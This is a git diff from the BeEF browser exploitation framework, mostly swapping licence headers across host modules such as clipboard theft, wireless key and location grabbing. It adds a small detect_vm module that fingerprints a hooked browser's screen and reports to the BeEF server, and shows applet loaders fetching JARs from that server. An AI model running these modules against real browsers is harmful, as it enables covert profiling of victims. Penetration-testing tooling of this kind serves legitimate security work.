a/modules/host/clipboard_theft/config.yaml +++ b/modules/host/clipboard_theft/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/clipboard_theft/module.rb b/modules/host/clipboard_theft/module.rb index 75274ab32..daa5e6ac5 100644 --- a/modules/host/clipboard_theft/module.rb +++ b/modules/host/clipboard_theft/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Clipboard_theft < BeEF::Core::Command diff --git a/modules/host/detect_cups/command.js b/modules/host/detect_cups/command.js index e05d44658..a2608dc7d 100644 --- a/modules/host/detect_cups/command.js +++ b/modules/host/detect_cups/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "Not Installed"; diff --git a/modules/host/detect_cups/config.yaml b/modules/host/detect_cups/config.yaml index 9b14c62f1..0658974e6 100644 --- a/modules/host/detect_cups/config.yaml +++ b/modules/host/detect_cups/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/detect_cups/module.rb b/modules/host/detect_cups/module.rb index a2cef67a4..fef9a3fc1 100644 --- a/modules/host/detect_cups/module.rb +++ b/modules/host/detect_cups/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_cups < BeEF::Core::Command diff --git a/modules/host/detect_google_desktop/command.js b/modules/host/detect_google_desktop/command.js index 428db53e0..c1749d5bb 100644 --- a/modules/host/detect_google_desktop/command.js +++ b/modules/host/detect_google_desktop/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dom = document.createElement('b'); diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml index 4a0d23f18..b3d42e577 100644 --- a/modules/host/detect_google_desktop/config.yaml +++ b/modules/host/detect_google_desktop/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -24,5 +14,5 @@ beef: target: not_working: ALL: - os: ["iPhone"] + os: ["iOS"] working: ["ALL"] diff --git a/modules/host/detect_google_desktop/module.rb b/modules/host/detect_google_desktop/module.rb index cadf07b80..949466bb9 100644 --- a/modules/host/detect_google_desktop/module.rb +++ b/modules/host/detect_google_desktop/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_google_desktop < BeEF::Core::Command diff --git a/modules/host/detect_protocol_handlers/command.js b/modules/host/detect_protocol_handlers/command.js index 90246fba2..b9c2c76bc 100644 --- a/modules/host/detect_protocol_handlers/command.js +++ b/modules/host/detect_protocol_handlers/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // Initialize diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml index a3de123a2..60ec6d67d 100644 --- a/modules/host/detect_protocol_handlers/config.yaml +++ b/modules/host/detect_protocol_handlers/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/detect_protocol_handlers/module.rb b/modules/host/detect_protocol_handlers/module.rb index 13a295ac1..df7b205ff 100644 --- a/modules/host/detect_protocol_handlers/module.rb +++ b/modules/host/detect_protocol_handlers/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Some additional protocol handlers # # ChromeHTML, code, Explorer.AssocProtocol.search-ms, FirefoxURL, gopher, icy, ie.http, ie.https, ie.ftp, iehistory, ierss, irc, itms, magnet, mapi, mms, mmst, mmsu, msbd, msdigitallocker, nntp, opera.protocol, outlook, pcast, rlogin, sc, search, search-ms, shout, skype, snews, steam, stssync, teamspeak, tel, telnet, tn3270, ts3file, ts3server, unsv, uvox, ventrilo, winamp, WindowsCalendar.UrlWebcal.1, WindowsMail.Url.Mailto, WindowsMail.Url.news, WindowsMail.Url.nntp, WindowsMail.Url.snews, WMP11.AssocProtocol.MMS, wpc diff --git a/modules/host/detect_software/command.js b/modules/host/detect_software/command.js index 5abaac7a5..4ef214605 100644 --- a/modules/host/detect_software/command.js +++ b/modules/host/detect_software/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var files = [ diff --git a/modules/host/detect_software/config.yaml b/modules/host/detect_software/config.yaml index 4a0ff900c..7c44db54a 100644 --- a/modules/host/detect_software/config.yaml +++ b/modules/host/detect_software/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/detect_software/module.rb b/modules/host/detect_software/module.rb index df587f431..b35f81c24 100644 --- a/modules/host/detect_software/module.rb +++ b/modules/host/detect_software/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_software < BeEF::Core::Command diff --git a/modules/host/detect_vm/command.js b/modules/host/detect_vm/command.js new file mode 100644 index 000000000..a22df9951 --- /dev/null +++ b/modules/host/detect_vm/command.js @@ -0,0 +1,56 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Written by Jeremiah Grossman +// Ported to BeEF by bcoles +// For more information see http://jeremiahgrossman.blogspot.com.au/2009/08/web-pages-detecting-virtualized.html + +beef.execute(function() { + + var result; + var dimensions = { + '320, 200' : '', + '320, 240' : '', + '640, 480' : '', + '800, 480' : '', + '768, 576' : '', + '854, 480' : '', + '1024, 600' : '', + '1152, 768' : '', + '800, 600' : '', + '1024, 768' : '', + '1280, 854' : '', + '1280, 960' : '', + '1280, 1024' : '', + '1280, 720' : '', + '1280, 768' : '', + '1366, 768' : '', + '1280, 800' : '', + '1440, 900' : '', + '1440, 960' : '', + '1400, 1050' : '', + '1600, 1200' : '', + '2048, 1536' : '', + '1680, 1050' : '', + '1920, 1080' : '', + '2048, 1080' : '', + '1920, 1200' : '', + '2560, 1600' : '', + '2560, 2048' : '' + }; + + var wh = screen.width + ", " + screen.height; + + if (dimensions[wh] != undefined) { + result = "Not virtualized"; + } else { + result = "This host is virtualized or uses an unrecognized screen resolution"; + } + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result); + +}); + diff --git a/modules/host/detect_vm/config.yaml b/modules/host/detect_vm/config.yaml new file mode 100644 index 000000000..8ee182664 --- /dev/null +++ b/modules/host/detect_vm/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_virtualization: + enable: true + category: "Host" + name: "Detect Virtual Machine" + description: "This module uses the host screen resolution as a cheap and easy method to check if the browser is running in a virtual environment.

Unusual screen resolutions, such as those used by wide screen televisions or hand-held devices, may result in false negative results." + authors: ["Jeremiah Grossman", "bcoles"] + target: + working: ["All"] diff --git a/modules/host/detect_vm/module.rb b/modules/host/detect_vm/module.rb new file mode 100644 index 000000000..0ed2c01e3 --- /dev/null +++ b/modules/host/detect_vm/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_virtualization < BeEF::Core::Command + + def post_execute + content = {} + content['result'] = @datastore['result'] if not @datastore['result'].nil? + save content + end + +end diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js index 9d207c1d1..575322055 100755 --- a/modules/host/get_internal_ip/command.js +++ b/modules/host/get_internal_ip/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/'; diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml index 68a4d63c3..9cb6d2072 100755 --- a/modules/host/get_internal_ip/config.yaml +++ b/modules/host/get_internal_ip/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java index 2882d1de1..f783260a3 100755 --- a/modules/host/get_internal_ip/get_internal_ip.java +++ b/modules/host/get_internal_ip/get_internal_ip.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.applet.Applet; import java.applet.AppletContext; import java.net.InetAddress; diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb index cb950806a..5f6948506 100755 --- a/modules/host/get_internal_ip/module.rb +++ b/modules/host/get_internal_ip/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_internal_ip < BeEF::Core::Command diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js index 9fb382db4..4047325e3 100755 --- a/modules/host/get_physical_location/command.js +++ b/modules/host/get_physical_location/command.js @@ -1,18 +1,9 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar'; var applet_id = '<%= @applet_id %>'; diff --git a/modules/host/get_physical_location/config.yaml b/modules/host/get_physical_location/config.yaml index afbb27215..49f7b48b2 100755 --- a/modules/host/get_physical_location/config.yaml +++ b/modules/host/get_physical_location/config.yaml @@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + beef: module: get_physical_location: diff --git a/modules/host/get_physical_location/getGPSLocation.java b/modules/host/get_physical_location/getGPSLocation.java index 0a1fb02ad..8491a7895 100755 --- a/modules/host/get_physical_location/getGPSLocation.java +++ b/modules/host/get_physical_location/getGPSLocation.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.io.*; import java.util.*; import java.net.*; diff --git a/modules/host/get_physical_location/module.rb b/modules/host/get_physical_location/module.rb index 17f4723fb..7136a52e4 100755 --- a/modules/host/get_physical_location/module.rb +++ b/modules/host/get_physical_location/module.rb @@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + require 'rubygems' require 'json' require 'open-uri' diff --git a/modules/host/get_registry_keys/command.js b/modules/host/get_registry_keys/command.js index df90099bc..c0bb9377d 100644 --- a/modules/host/get_registry_keys/command.js +++ b/modules/host/get_registry_keys/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var internal_counter = 0; diff --git a/modules/host/get_registry_keys/config.yaml b/modules/host/get_registry_keys/config.yaml index fda7b3d7a..9d0ef23a4 100644 --- a/modules/host/get_registry_keys/config.yaml +++ b/modules/host/get_registry_keys/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/get_registry_keys/module.rb b/modules/host/get_registry_keys/module.rb index 07d4e4d17..f8a530b52 100644 --- a/modules/host/get_registry_keys/module.rb +++ b/modules/host/get_registry_keys/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_registry_keys < BeEF::Core::Command diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js index 9eea6fb32..6e8f6c1bd 100644 --- a/modules/host/get_system_info/command.js +++ b/modules/host/get_system_info/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var internal_counter = 0; diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml index 802db1695..1c7c1ca21 100644 --- a/modules/host/get_system_info/config.yaml +++ b/modules/host/get_system_info/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -24,6 +14,6 @@ beef: target: not_working: ALL: - os: ["iPhone", "Macintosh"] + os: ["iOS", "Macintosh"] working: ["O", "FF", "S", "IE"] user_notify: ["C"] diff --git a/modules/host/get_system_info/getSystemInfo.java b/modules/host/get_system_info/getSystemInfo.java index e6f0f06f4..1d07209f2 100644 --- a/modules/host/get_system_info/getSystemInfo.java +++ b/modules/host/get_system_info/getSystemInfo.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.applet.*; import java.awt.*; import java.net.*; diff --git a/modules/host/get_system_info/module.rb b/modules/host/get_system_info/module.rb index 128db8a54..2511eedc6 100644 --- a/modules/host/get_system_info/module.rb +++ b/modules/host/get_system_info/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_system_info < BeEF::Core::Command diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js index 54aec9505..350d70552 100644 --- a/modules/host/get_wireless_keys/command.js +++ b/modules/host/get_wireless_keys/command.js @@ -1,18 +1,9 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; var applet_id = '<%= @applet_id %>'; diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml index 6bf1f7159..834c47a50 100644 --- a/modules/host/get_wireless_keys/config.yaml +++ b/modules/host/get_wireless_keys/config.yaml @@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + beef: module: 